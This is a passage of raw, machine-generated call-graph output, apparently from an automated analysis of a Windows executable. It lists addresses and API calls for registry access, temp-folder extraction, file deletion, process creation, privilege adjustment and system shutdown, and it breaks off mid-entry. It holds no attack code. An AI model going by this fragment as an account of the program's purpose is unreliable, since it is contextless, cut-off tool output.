7ff7d6fd5d90 2191->2546 2199 7ff7d6fd3383 2193->2199 2202 7ff7d6fd3236 2193->2202 2200 7ff7d6fd7ac8 28 API calls 2194->2200 2195 7ff7d6fd3230 2195->2202 2197 7ff7d6fd32f6 2197->2202 2634 7ff7d6fd772c 2197->2634 2644 7ff7d6fd494c 2199->2644 2200->2197 2202->2171 2204->2189 2204->2190 2204->2202 2206 7ff7d6fd6214 2205->2206 2207 7ff7d6fd624c LocalFree LocalFree 2206->2207 2209 7ff7d6fd6229 SetFileAttributesA DeleteFileA 2206->2209 2216 7ff7d6fd6273 2206->2216 2207->2206 2208 7ff7d6fd6311 2210 7ff7d6fd6387 2208->2210 2212 7ff7d6fd632d RegOpenKeyExA 2208->2212 2209->2207 2211 7ff7d6fd8470 7 API calls 2210->2211 2213 7ff7d6fd2ce8 2211->2213 2212->2210 2214 7ff7d6fd635e RegDeleteValueA RegCloseKey 2212->2214 2213->2097 2213->2104 2219 7ff7d6fd2318 2213->2219 2214->2210 2215 7ff7d6fd62f4 SetCurrentDirectoryA 2218 7ff7d6fd204c 16 API calls 2215->2218 2216->2208 2216->2215 2217 7ff7d6fd7c40 4 API calls 2216->2217 2217->2215 2218->2208 2220 7ff7d6fd2330 2219->2220 2221 7ff7d6fd2447 2219->2221 2223 7ff7d6fd23cb RegOpenKeyExA 2220->2223 2224 7ff7d6fd233a 2220->2224 2893 7ff7d6fd2244 GetWindowsDirectoryA 2221->2893 2225 7ff7d6fd23c3 2223->2225 2226 7ff7d6fd23fe RegQueryInfoKeyA 2223->2226 2224->2225 2227 7ff7d6fd234a RegOpenKeyExA 2224->2227 2225->2104 2228 7ff7d6fd23a8 RegCloseKey 2226->2228 2227->2225 2229 7ff7d6fd237d RegQueryValueExA 2227->2229 2228->2225 2229->2228 2231 7ff7d6fd5024 2230->2231 2232 7ff7d6fd4e49 LoadStringA 2230->2232 2235 7ff7d6fd8470 7 API calls 2231->2235 2233 7ff7d6fd4e73 2232->2233 2234 7ff7d6fd4eb5 2232->2234 2238 7ff7d6fd7f04 13 API calls 2233->2238 2236 7ff7d6fd4f31 2234->2236 2241 7ff7d6fd4ec1 LocalAlloc 2234->2241 2237 7ff7d6fd2d59 2235->2237 2243 7ff7d6fd4f44 LocalAlloc 2236->2243 2244 7ff7d6fd4f8e LocalAlloc 2236->2244 2237->2097 2237->2106 2239 7ff7d6fd4e78 2238->2239 2240 7ff7d6fd4e81 MessageBoxA 2239->2240 2242 7ff7d6fd7e34 2 API calls 2239->2242 2240->2231 2241->2231 2249 7ff7d6fd4f14 2241->2249 2242->2240 2243->2231 2250 7ff7d6fd4f79 2243->2250 2244->2231 2254 7ff7d6fd4f2c 2244->2254 2248 7ff7d6fd4fbc MessageBeep 2252 7ff7d6fd7f04 13 API calls 2248->2252 2253 7ff7d6fd114c _vsnprintf 2249->2253 2251 7ff7d6fd114c _vsnprintf 2250->2251 2251->2254 2255 7ff7d6fd4fd3 2252->2255 2253->2254 2254->2248 2256 7ff7d6fd4fdc MessageBoxA LocalFree 2255->2256 2257 7ff7d6fd7e34 2 API calls 2255->2257 2256->2231 2257->2256 2260 7ff7d6fd1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2263 7ff7d6fd1c4c 2259->2263 2261 7ff7d6fd1cec ExitWindowsEx 2260->2261 2260->2263 2261->2263 2264 7ff7d6fd1c68 2261->2264 2262 7ff7d6fd4dcc 24 API calls 2262->2264 2263->2262 2265 7ff7d6fd8470 7 API calls 2264->2265 2266 7ff7d6fd1d1a 2265->2266 2266->2097 2268 7ff7d6fd509b 2267->2268 2269 7ff7d6fd2e43 2267->2269 2268->2269 2270 7ff7d6fd50a4 FindResourceA LoadResource LockResource 2268->2270 2269->2118 2269->2134 2270->2269 2271 7ff7d6fd50e3 memcpy_s FreeResource 2270->2271 2271->2269 2282 7ff7d6fd7566 2272->2282 2297 7ff7d6fd70f2 2272->2297 2273 7ff7d6fd8470 7 API calls 2274 7ff7d6fd2fb1 2273->2274 2274->2133 2274->2134 2275 7ff7d6fd711d CharNextA 2275->2297 2276 7ff7d6fd71e7 GetModuleFileNameA 2277 7ff7d6fd720f 2276->2277 2278 7ff7d6fd721c 2276->2278 2364 7ff7d6fd7d68 2277->2364 2278->2282 2280 7ff7d6fd76f1 2373 7ff7d6fd8648 RtlCaptureContext RtlLookupFunctionEntry 2280->2373 2282->2273 2283 7ff7d6fd71ca 2283->2276 2283->2282 2285 7ff7d6fd7238 CharUpperA 2286 7ff7d6fd766f 2285->2286 2285->2297 2287 7ff7d6fd4dcc 24 API calls 2286->2287 2288 7ff7d6fd7692 2287->2288 2289 7ff7d6fd769e CloseHandle 2288->2289 2290 7ff7d6fd76aa ExitProcess 2288->2290 2289->2290 2291 7ff7d6fd739d CharUpperA 2291->2297 2292 7ff7d6fd7ce8 IsDBCSLeadByte CharNextA 2292->2297 2293 7ff7d6fd7346 CompareStringA 2293->2297 2294 7ff7d6fd73fb CharUpperA 2294->2297 2295 7ff7d6fd7492 CharUpperA 2295->2297 2296 7ff7d6fd72d0 CharUpperA 2296->2297 2297->2275 2297->2280 2297->2282 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff7d6fd7ba8 2297->2369 2301 7ff7d6fd8479 2299->2301 2300 7ff7d6fd2cd4 2300->2097 2300->2159 2301->2300 2302 7ff7d6fd84d0 RtlCaptureContext RtlLookupFunctionEntry 2301->2302 2303 7ff7d6fd8515 RtlVirtualUnwind 2302->2303 2304 7ff7d6fd8557 2302->2304 2303->2304 2379 7ff7d6fd8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff7d6fd2213 2307->2308 2311 7ff7d6fd2086 2307->2311 2309 7ff7d6fd8470 7 API calls 2308->2309 2310 7ff7d6fd2222 2309->2310 2310->2148 2312 7ff7d6fd20dc FindFirstFileA 2311->2312 2312->2308 2313 7ff7d6fd20fe 2312->2313 2314 7ff7d6fd21a3 2313->2314 2315 7ff7d6fd2138 lstrcmpA 2313->2315 2317 7ff7d6fd21d9 FindNextFileA 2313->2317 2320 7ff7d6fd7ba8 CharPrevA 2313->2320 2321 7ff7d6fd204c 8 API calls 2313->2321 2318 7ff7d6fd21b4 SetFileAttributesA DeleteFileA 2314->2318 2316 7ff7d6fd2158 lstrcmpA 2315->2316 2315->2317 2316->2313 2316->2317 2317->2313 2319 7ff7d6fd21f5 FindClose RemoveDirectoryA 2317->2319 2318->2317 2319->2308 2320->2313 2321->2313 2327 7ff7d6fd3c59 2322->2327 2330 7ff7d6fd3c4f 2322->2330 2323 7ff7d6fd4dcc 24 API calls 2324 7ff7d6fd3f05 2323->2324 2325 7ff7d6fd8470 7 API calls 2324->2325 2326 7ff7d6fd3042 2325->2326 2326->2148 2337 7ff7d6fd12ec 2326->2337 2327->2324 2329 7ff7d6fd3db1 2327->2329 2327->2330 2380 7ff7d6fd2834 2327->2380 2329->2324 2329->2330 2331 7ff7d6fd3eb7 MessageBeep 2329->2331 2330->2323 2330->2324 2393 7ff7d6fd7f04 2331->2393 2334 7ff7d6fd3ed3 MessageBoxA 2334->2324 2338 7ff7d6fd133c 2337->2338 2343 7ff7d6fd14b5 2337->2343 2427 7ff7d6fd11cc LoadLibraryA 2338->2427 2340 7ff7d6fd8470 7 API calls 2342 7ff7d6fd14da 2340->2342 2342->2148 2356 7ff7d6fd7ac8 FindResourceA 2342->2356 2343->2340 2344 7ff7d6fd134d GetCurrentProcess OpenProcessToken 2344->2343 2345 7ff7d6fd1377 GetTokenInformation 2344->2345 2346 7ff7d6fd14a0 CloseHandle 2345->2346 2347 7ff7d6fd13a0 GetLastError 2345->2347 2346->2343 2347->2346 2348 7ff7d6fd13b5 LocalAlloc 2347->2348 2348->2346 2349 7ff7d6fd13d2 GetTokenInformation 2348->2349 2350 7ff7d6fd1491 LocalFree 2349->2350 2351 7ff7d6fd13fc AllocateAndInitializeSid 2349->2351 2350->2346 2351->2350 2354 7ff7d6fd1445 2351->2354 2352 7ff7d6fd1481 FreeSid 2352->2350 2353 7ff7d6fd1452 EqualSid 2353->2354 2355 7ff7d6fd1476 2353->2355 2354->2352 2354->2353 2354->2355 2355->2352 2357 7ff7d6fd7b63 2356->2357 2358 7ff7d6fd7b03 LoadResource 2356->2358 2360 7ff7d6fd4dcc 24 API calls 2357->2360 2358->2357 2359 7ff7d6fd7b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2363 7ff7d6fd7b87 2359->2363 2361 7ff7d6fd7b82 2360->2361 2361->2363 2363->2158 2365 7ff7d6fd7dd9 2364->2365 2367 7ff7d6fd7d88 2364->2367 2365->2278 2366 7ff7d6fd7d90 IsDBCSLeadByte 2366->2367 2367->2366 2368 7ff7d6fd7db6 CharNextA 2367->2368 2368->2365 2368->2367 2370 7ff7d6fd7bc8 2369->2370 2370->2370 2371 7ff7d6fd7bda 2370->2371 2372 7ff7d6fd7bec CharPrevA 2370->2372 2371->2297 2372->2371 2374 7ff7d6fd8685 RtlVirtualUnwind 2373->2374 2375 7ff7d6fd86c7 2373->2375 2374->2375 2378 7ff7d6fd8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff7d6fd2a2f 2380->2381 2390 7ff7d6fd2872 2380->2390 2382 7ff7d6fd2a50 2381->2382 2383 7ff7d6fd2a41 GlobalFree 2381->2383 2382->2329 2383->2382 2385 7ff7d6fd28a5 GetFileVersionInfoSizeA 2386 7ff7d6fd28c2 GlobalAlloc 2385->2386 2385->2390 2386->2381 2387 7ff7d6fd28e1 GlobalLock 2386->2387 2387->2381 2388 7ff7d6fd28fc GetFileVersionInfoA 2387->2388 2389 7ff7d6fd2920 VerQueryValueA 2388->2389 2388->2390 2389->2390 2391 7ff7d6fd29ed GlobalUnlock 2389->2391 2390->2381 2390->2385 2390->2391 2392 7ff7d6fd29d9 GlobalUnlock 2390->2392 2408 7ff7d6fd261c 2390->2408 2391->2390 2392->2381 2394 7ff7d6fd7f44 GetVersionExA 2393->2394 2395 7ff7d6fd8076 2393->2395 2394->2395 2396 7ff7d6fd7f6d 2394->2396 2397 7ff7d6fd8470 7 API calls 2395->2397 2396->2395 2399 7ff7d6fd7f90 GetSystemMetrics 2396->2399 2398 7ff7d6fd3eca 2397->2398 2398->2334 2404 7ff7d6fd7e34 2398->2404 2399->2395 2400 7ff7d6fd7fa7 RegOpenKeyExA 2399->2400 2400->2395 2401 7ff7d6fd7fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2395 2403 7ff7d6fd8026 2401->2403 2402 7ff7d6fd8065 CharNextA 2402->2403 2403->2395 2403->2402 2405 7ff7d6fd7edd 2404->2405 2406 7ff7d6fd7e5a EnumResourceLanguagesA 2404->2406 2405->2334 2406->2405 2407 7ff7d6fd7e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff7d6fd27e0 GetSystemDirectoryA 2408->2409 2410 7ff7d6fd265b CharUpperA CharNextA CharNextA 2408->2410 2413 7ff7d6fd27f1 2409->2413 2411 7ff7d6fd269c 2410->2411 2412 7ff7d6fd27dd 2410->2412 2414 7ff7d6fd26a6 2411->2414 2415 7ff7d6fd27c7 GetWindowsDirectoryA 2411->2415 2412->2409 2416 7ff7d6fd2805 2413->2416 2417 7ff7d6fd7ba8 CharPrevA 2413->2417 2420 7ff7d6fd7ba8 CharPrevA 2414->2420 2415->2413 2418 7ff7d6fd8470 7 API calls 2416->2418 2417->2416 2419 7ff7d6fd2814 2418->2419 2419->2390 2421 7ff7d6fd2705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff7d6fd2738 RegQueryValueExA 2421->2422 2423 7ff7d6fd27b4 RegCloseKey 2422->2423 2424 7ff7d6fd276b 2422->2424 2423->2413 2425 7ff7d6fd2774 ExpandEnvironmentStringsA 2424->2425 2426 7ff7d6fd2792 2424->2426 2425->2426 2426->2423 2428 7ff7d6fd1221 GetProcAddress 2427->2428 2429 7ff7d6fd12bb 2427->2429 2430 7ff7d6fd123f AllocateAndInitializeSid 2428->2430 2431 7ff7d6fd12ac FreeLibrary 2428->2431 2432 7ff7d6fd8470 7 API calls 2429->2432 2430->2431 2433 7ff7d6fd1288 FreeSid 2430->2433 2431->2429 2434 7ff7d6fd12ca 2432->2434 2433->2431 2434->2343 2434->2344 2437 7ff7d6fd5050 7 API calls 2436->2437 2438 7ff7d6fd60bf LocalAlloc 2437->2438 2439 7ff7d6fd610b 2438->2439 2440 7ff7d6fd60dd 2438->2440 2442 7ff7d6fd5050 7 API calls 2439->2442 2441 7ff7d6fd4dcc 24 API calls 2440->2441 2443 7ff7d6fd60fb 2441->2443 2444 7ff7d6fd611d 2442->2444 2657 7ff7d6fd7700 GetLastError 2443->2657 2446 7ff7d6fd6121 2444->2446 2447 7ff7d6fd615a lstrcmpA 2444->2447 2448 7ff7d6fd4dcc 24 API calls 2446->2448 2449 7ff7d6fd6174 LocalFree 2447->2449 2450 7ff7d6fd618a 2447->2450 2453 7ff7d6fd613f LocalFree 2448->2453 2452 7ff7d6fd3123 2449->2452 2451 7ff7d6fd4dcc 24 API calls 2450->2451 2454 7ff7d6fd61ac LocalFree 2451->2454 2452->2161 2452->2162 2452->2202 2453->2452 2455 7ff7d6fd6100 2454->2455 2455->2452 2457 7ff7d6fd5050 7 API calls 2456->2457 2458 7ff7d6fd6001 2457->2458 2459 7ff7d6fd6006 2458->2459 2460 7ff7d6fd604a 2458->2460 2461 7ff7d6fd4dcc 24 API calls 2459->2461 2462 7ff7d6fd5050 7 API calls 2460->2462 2463 7ff7d6fd6025 2461->2463 2464 7ff7d6fd6063 2462->2464 2465 7ff7d6fd3146 2463->2465 2466 7ff7d6fd772c 13 API calls 2464->2466 2465->2202 2470 7ff7d6fd66c4 2465->2470 2467 7ff7d6fd606f 2466->2467 2467->2465 2468 7ff7d6fd6073 2467->2468 2469 7ff7d6fd4dcc 24 API calls 2468->2469 2469->2463 2471 7ff7d6fd5050 7 API calls 2470->2471 2472 7ff7d6fd6706 LocalAlloc 2471->2472 2473 7ff7d6fd6756 2472->2473 2474 7ff7d6fd6726 2472->2474 2475 7ff7d6fd5050 7 API calls 2473->2475 2476 7ff7d6fd4dcc 24 API calls 2474->2476 2477 7ff7d6fd6768 2475->2477 2478 7ff7d6fd6744 2476->2478 2479 7ff7d6fd67a5 lstrcmpA LocalFree 2477->2479 2480 7ff7d6fd676c 2477->2480 2682 7ff7d6fd7700 GetLastError 2478->2682 2483 7ff7d6fd67ec 2479->2483 2484 7ff7d6fd6837 2479->2484 2482 7ff7d6fd4dcc 24 API calls 2480->2482 2488 7ff7d6fd678a LocalFree 2482->2488 2493 7ff7d6fd64e4 53 API calls 2483->2493 2487 7ff7d6fd6b14 2484->2487 2490 7ff7d6fd684f GetTempPathA 2484->2490 2485 7ff7d6fd6749 2486 7ff7d6fd674f 2485->2486 2491 7ff7d6fd8470 7 API calls 2486->2491 2489 7ff7d6fd7ac8 28 API calls 2487->2489 2488->2486 2489->2486 2492 7ff7d6fd6872 2490->2492 2499 7ff7d6fd68a5 2490->2499 2494 7ff7d6fd3153 2491->2494 2658 7ff7d6fd64e4 2492->2658 2496 7ff7d6fd680c 2493->2496 2494->2173 2494->2202 2496->2486 2498 7ff7d6fd6814 2496->2498 2500 7ff7d6fd4dcc 24 API calls 2498->2500 2499->2486 2501 7ff7d6fd6adb GetWindowsDirectoryA 2499->2501 2502 7ff7d6fd68f9 GetDriveTypeA 2499->2502 2500->2485 2506 7ff7d6fd6ca4 38 API calls 2501->2506 2504 7ff7d6fd6916 GetFileAttributesA 2502->2504 2517 7ff7d6fd6911 2502->2517 2504->2517 2506->2499 2507 7ff7d6fd64e4 53 API calls 2507->2499 2508 7ff7d6fd6ca4 38 API calls 2508->2517 2509 7ff7d6fd6955 GetDiskFreeSpaceA 2511 7ff7d6fd6983 MulDiv 2509->2511 2509->2517 2510 7ff7d6fd2468 25 API calls 2510->2517 2511->2517 2512 7ff7d6fd6a02 GetWindowsDirectoryA 2512->2517 2513 7ff7d6fd7ba8 CharPrevA 2514 7ff7d6fd6a2a GetFileAttributesA 2513->2514 2515 7ff7d6fd6a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff7d6fd6a6d SetFileAttributesA 2516->2517 2517->2486 2517->2501 2517->2502 2517->2504 2517->2508 2517->2509 2517->2510 2517->2512 2517->2513 2517->2516 2518 7ff7d6fd64e4 53 API calls 2517->2518 2518->2517 2520 7ff7d6fd6d3f GetDiskFreeSpaceA 2519->2520 2521 7ff7d6fd6d12 2519->2521 2523 7ff7d6fd6f63 memset 2520->2523 2524 7ff7d6fd6d80 MulDiv 2520->2524 2522 7ff7d6fd4dcc 24 API calls 2521->2522 2525 7ff7d6fd6d2f 2522->2525 2736 7ff7d6fd7700 GetLastError 2523->2736 2524->2523 2527 7ff7d6fd6dae GetVolumeInformationA 2524->2527 2717 7ff7d6fd7700 GetLastError 2525->2717 2530 7ff7d6fd6e45 SetCurrentDirectoryA 2527->2530 2531 7ff7d6fd6de6 memset 2527->2531 2529 7ff7d6fd6f7b GetLastError FormatMessageA 2533 7ff7d6fd6fbd 2529->2533 2539 7ff7d6fd6e6c 2530->2539 2718 7ff7d6fd7700 GetLastError 2531->2718 2532 7ff7d6fd6d34 2535 7ff7d6fd6f41 2532->2535 2536 7ff7d6fd4dcc 24 API calls 2533->2536 2540 7ff7d6fd8470 7 API calls 2535->2540 2538 7ff7d6fd6fd8 SetCurrentDirectoryA 2536->2538 2537 7ff7d6fd6dfe GetLastError FormatMessageA 2537->2533 2538->2535 2541 7ff7d6fd6eb4 2539->2541 2544 7ff7d6fd6ed8 2539->2544 2542 7ff7d6fd326f 2540->2542 2543 7ff7d6fd4dcc 24 API calls 2541->2543 2542->2179 2542->2202 2543->2532 2544->2535 2719 7ff7d6fd24f8 2544->2719 2547 7ff7d6fd5050 7 API calls 2546->2547 2548 7ff7d6fd5dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff7d6fd5dfc 2548->2549 2565 7ff7d6fd5fcf 2548->2565 2550 7ff7d6fd5e56 2549->2550 2551 7ff7d6fd5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2551 2737 7ff7d6fd5c60 #20 2550->2737 2551->2550 2554 7ff7d6fd5e69 #20 2555 7ff7d6fd5ed1 #22 2554->2555 2556 7ff7d6fd5e5f 2554->2556 2557 7ff7d6fd5f55 2555->2557 2558 7ff7d6fd5f15 #23 2555->2558 2559 7ff7d6fd4dcc 24 API calls 2556->2559 2561 7ff7d6fd5f75 2557->2561 2562 7ff7d6fd5f61 FreeResource 2557->2562 2558->2556 2558->2557 2560 7ff7d6fd5f53 2559->2560 2560->2557 2563 7ff7d6fd5f9f 2561->2563 2564 7ff7d6fd5f81 2561->2564 2562->2561 2563->2565 2567 7ff7d6fd5fb1 SendMessageA 2563->2567 2566 7ff7d6fd4dcc 24 API calls 2564->2566 2565->2197 2566->2563 2567->2565 2569 7ff7d6fd4118 2568->2569 2597 7ff7d6fd412f 2568->2597 2570 7ff7d6fd5050 7 API calls 2569->2570 2570->2597 2571 7ff7d6fd4145 memset 2571->2597 2572 7ff7d6fd4254 2573 7ff7d6fd4dcc 24 API calls 2572->2573 2610 7ff7d6fd4273 2573->2610 2575 7ff7d6fd44ee 2577 7ff7d6fd8470 7 API calls 2575->2577 2576 7ff7d6fd5050 7 API calls 2576->2597 2578 7ff7d6fd44ff 2577->2578 2578->2193 2579 7ff7d6fd42f5 CompareStringA 2580 7ff7d6fd45d8 2579->2580 2579->2597 2580->2575 2582 7ff7d6fd45f2 RegOpenKeyExA 2580->2582 2581 7ff7d6fd44df LocalFree 2581->2575 2582->2575 2586 7ff7d6fd4627 RegQueryValueExA 2582->2586 2583 7ff7d6fd4599 2585 7ff7d6fd4dcc 24 API calls 2583->2585 2587 7ff7d6fd45b8 LocalFree 2585->2587 2589 7ff7d6fd471c RegCloseKey 2586->2589 2590 7ff7d6fd466c memset GetSystemDirectoryA 2586->2590 2587->2575 2589->2575 2593 7ff7d6fd46b3 2590->2593 2594 7ff7d6fd469d 2590->2594 2592 7ff7d6fd44ad LocalFree 2592->2580 2592->2597 2596 7ff7d6fd114c _vsnprintf 2593->2596 2598 7ff7d6fd7ba8 CharPrevA 2594->2598 2595 7ff7d6fd41fd CompareStringA 2595->2597 2601 7ff7d6fd46dc RegSetValueExA 2596->2601 2597->2571 2597->2572 2597->2575 2597->2576 2597->2579 2597->2580 2597->2581 2597->2583 2597->2592 2597->2595 2611 7ff7d6fd4394 2597->2611 2764 7ff7d6fd1684 2597->2764 2803 7ff7d6fd1d28 memset memset RegCreateKeyExA 2597->2803 2830 7ff7d6fd473c CreateProcessA 2597->2830 2598->2593 2599 7ff7d6fd4574 2603 7ff7d6fd4dcc 24 API calls 2599->2603 2600 7ff7d6fd43a5 GetProcAddress 2602 7ff7d6fd4521 2600->2602 2600->2611 2601->2589 2606 7ff7d6fd4dcc 24 API calls 2602->2606 2605 7ff7d6fd4597 2603->2605 2607 7ff7d6fd4553 LocalFree 2605->2607 2608 7ff7d6fd4544 FreeLibrary 2606->2608 2855 7ff7d6fd7700 GetLastError 2607->2855 2608->2607 2610->2575 2611->2599 2611->2600 2612 7ff7d6fd44d3 FreeLibrary 2611->2612 2613 7ff7d6fd4480 FreeLibrary 2611->2613 2845 7ff7d6fd79f0 2611->2845 2612->2581 2613->2592 2615 7ff7d6fd5050 7 API calls 2614->2615 2616 7ff7d6fd3f8b LocalAlloc 2615->2616 2617 7ff7d6fd3fdd 2616->2617 2618 7ff7d6fd3fad 2616->2618 2619 7ff7d6fd5050 7 API calls 2617->2619 2620 7ff7d6fd4dcc 24 API calls 2618->2620 2621 7ff7d6fd3fef 2619->2621 2622 7ff7d6fd3fcb 2620->2622 2624 7ff7d6fd3ff3 2621->2624 2625 7ff7d6fd4030 lstrcmpA 2621->2625 2892 7ff7d6fd7700 GetLastError 2622->2892 2626 7ff7d6fd4dcc 24 API calls 2624->2626 2627 7ff7d6fd404e 2625->2627 2628 7ff7d6fd4098 LocalFree 2625->2628 2630 7ff7d6fd4011 LocalFree 2626->2630 2631 7ff7d6fd7ac8 28 API calls 2627->2631 2629 7ff7d6fd3139 2628->2629 2629->2161 2629->2202 2630->2629 2632 7ff7d6fd406e LocalFree 2631->2632 2632->2629 2633->2195 2641 7ff7d6fd778a 2634->2641 2635 7ff7d6fd114c _vsnprintf 2636 7ff7d6fd77df FindResourceA 2635->2636 2637 7ff7d6fd7801 2636->2637 2638 7ff7d6fd775e LoadResource LockResource 2636->2638 2639 7ff7d6fd8470 7 API calls 2637->2639 2638->2637 2638->2641 2640 7ff7d6fd782e 2639->2640 2640->2204 2641->2635 2642 7ff7d6fd7803 FreeResource 2641->2642 2643 7ff7d6fd77b8 FreeResource 2641->2643 2642->2637 2643->2641 2645 7ff7d6fd5050 7 API calls 2644->2645 2646 7ff7d6fd4967 LocalAlloc 2645->2646 2647 7ff7d6fd49a9 2646->2647 2648 7ff7d6fd4989 2646->2648 2650 7ff7d6fd5050 7 API calls 2647->2650 2649 7ff7d6fd4dcc 24 API calls 2648->2649 2651 7ff7d6fd49a7 2649->2651 2652 7ff7d6fd49bb 2650->2652 2651->2202 2653 7ff7d6fd49d5 lstrcmpA 2652->2653 2655 7ff7d6fd49bf 2652->2655 2654 7ff7d6fd4a0e LocalFree 2653->2654 2653->2655 2654->2651 2656 7ff7d6fd4dcc 24 API calls 2655->2656 2656->2654 2657->2455 2659 7ff7d6fd6516 2658->2659 2662 7ff7d6fd65dd 2658->2662 2689 7ff7d6fd63b8 2659->2689 2661 7ff7d6fd6688 2665 7ff7d6fd8470 7 API calls 2661->2665 2700 7ff7d6fd6b70 2662->2700 2669 7ff7d6fd66a8 2665->2669 2667 7ff7d6fd65cc 2672 7ff7d6fd7ba8 CharPrevA 2667->2672 2668 7ff7d6fd6577 GetSystemInfo 2680 7ff7d6fd6591 2668->2680 2669->2486 2683 7ff7d6fd2468 GetWindowsDirectoryA 2669->2683 2670 7ff7d6fd6649 2670->2661 2675 7ff7d6fd6ca4 38 API calls 2670->2675 2671 7ff7d6fd662a CreateDirectoryA 2673 7ff7d6fd663f 2671->2673 2674 7ff7d6fd667d 2671->2674 2672->2662 2673->2670 2712 7ff7d6fd7700 GetLastError 2674->2712 2678 7ff7d6fd665a 2675->2678 2677 7ff7d6fd7ba8 CharPrevA 2677->2667 2678->2661 2681 7ff7d6fd6666 RemoveDirectoryA 2678->2681 2679 7ff7d6fd6682 2679->2661 2680->2667 2680->2677 2681->2661 2682->2485 2684 7ff7d6fd24c4 2683->2684 2685 7ff7d6fd24a6 2683->2685 2687 7ff7d6fd8470 7 API calls 2684->2687 2686 7ff7d6fd4dcc 24 API calls 2685->2686 2686->2684 2688 7ff7d6fd24df 2687->2688 2688->2499 2688->2507 2691 7ff7d6fd63e3 2689->2691 2692 7ff7d6fd7ba8 CharPrevA 2691->2692 2695 7ff7d6fd644b GetTempFileNameA 2691->2695 2713 7ff7d6fd114c 2691->2713 2693 7ff7d6fd6420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff7d6fd64b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff7d6fd6490 2694->2696 2695->2696 2697 7ff7d6fd646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff7d6fd8470 7 API calls 2696->2698 2697->2696 2699 7ff7d6fd64a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff7d6fd6b8b 2700->2701 2701->2701 2702 7ff7d6fd6b94 LocalAlloc 2701->2702 2703 7ff7d6fd6bb4 2702->2703 2705 7ff7d6fd6bf5 2702->2705 2704 7ff7d6fd4dcc 24 API calls 2703->2704 2711 7ff7d6fd6bd2 2704->2711 2707 7ff7d6fd7ba8 CharPrevA 2705->2707 2709 7ff7d6fd6c14 CreateFileA LocalFree 2707->2709 2708 7ff7d6fd6626 2708->2670 2708->2671 2710 7ff7d6fd6c61 CloseHandle GetFileAttributesA 2709->2710 2709->2711 2710->2711 2711->2708 2716 7ff7d6fd7700 GetLastError 2711->2716 2712->2679 2714 7ff7d6fd1178 _vsnprintf 2713->2714 2715 7ff7d6fd1199 2713->2715 2714->2715 2715->2691 2716->2708 2717->2532 2718->2537 2720 7ff7d6fd2525 2719->2720 2721 7ff7d6fd2562 2719->2721 2722 7ff7d6fd114c _vsnprintf 2720->2722 2723 7ff7d6fd2567 2721->2723 2724 7ff7d6fd25ab 2721->2724 2726 7ff7d6fd253d 2722->2726 2727 7ff7d6fd114c _vsnprintf 2723->2727 2725 7ff7d6fd255d 2724->2725 2728 7ff7d6fd114c _vsnprintf 2724->2728 2729 7ff7d6fd8470 7 API calls 2725->2729 2730 7ff7d6fd4dcc 24 API calls 2726->2730 2731 7ff7d6fd257f 2727->2731 2732 7ff7d6fd25c7 2728->2732 2733 7ff7d6fd2609 2729->2733 2730->2725 2734 7ff7d6fd4dcc 24 API calls 2731->2734 2735 7ff7d6fd4dcc 24 API calls 2732->2735 2733->2535 2734->2725 2735->2725 2736->2529 2738 7ff7d6fd5ced 2737->2738 2739 7ff7d6fd5d62 2737->2739 2749 7ff7d6fd5380 2738->2749 2741 7ff7d6fd8470 7 API calls 2739->2741 2743 7ff7d6fd5d78 2741->2743 2743->2554 2743->2556 2744 7ff7d6fd5d0d #21 2744->2739 2745 7ff7d6fd5d28 2744->2745 2745->2739 2761 7ff7d6fd5770 2745->2761 2748 7ff7d6fd5d4f #23 2748->2739 2750 7ff7d6fd53b3 2749->2750 2751 7ff7d6fd53d0 2750->2751 2752 7ff7d6fd53fd lstrcmpA 2750->2752 2754 7ff7d6fd4dcc 24 API calls 2751->2754 2753 7ff7d6fd53f4 2752->2753 2755 7ff7d6fd5454 2752->2755 2753->2739 2753->2744 2754->2753 2755->2753 2756 7ff7d6fd54a8 CreateFileA 2755->2756 2756->2753 2758 7ff7d6fd54de 2756->2758 2757 7ff7d6fd5561 CreateFileA 2757->2753 2758->2753 2758->2757 2759 7ff7d6fd5549 CharNextA 2758->2759 2760 7ff7d6fd5532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff7d6fd57a4 CloseHandle 2761->2762 2763 7ff7d6fd578f 2761->2763 2762->2763 2763->2739 2763->2748 2765 7ff7d6fd16d3 2764->2765 2856 7ff7d6fd15e8 2765->2856 2768 7ff7d6fd7ba8 CharPrevA 2770 7ff7d6fd1766 2768->2770 2769 7ff7d6fd7d68 2 API calls 2771 7ff7d6fd1811 2769->2771 2770->2769 2772 7ff7d6fd1a1b 2771->2772 2773 7ff7d6fd181a CompareStringA 2771->2773 2774 7ff7d6fd7d68 2 API calls 2772->2774 2773->2772 2775 7ff7d6fd184d GetFileAttributesA 2773->2775 2776 7ff7d6fd1a28 2774->2776 2777 7ff7d6fd19f3 2775->2777 2778 7ff7d6fd1867 2775->2778 2779 7ff7d6fd1a31 CompareStringA 2776->2779 2780 7ff7d6fd1acb LocalAlloc 2776->2780 2782 7ff7d6fd4dcc 24 API calls 2777->2782 2778->2777 2781 7ff7d6fd15e8 2 API calls 2778->2781 2779->2780 2790 7ff7d6fd1a60 2779->2790 2780->2777 2783 7ff7d6fd1aeb GetFileAttributesA 2780->2783 2784 7ff7d6fd188b 2781->2784 2800 7ff7d6fd194f 2782->2800 2795 7ff7d6fd1b01 2783->2795 2785 7ff7d6fd18b5 LocalAlloc 2784->2785 2787 7ff7d6fd15e8 2 API calls 2784->2787 2785->2777 2788 7ff7d6fd18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2788 2786 7ff7d6fd1bd1 2789 7ff7d6fd8470 7 API calls 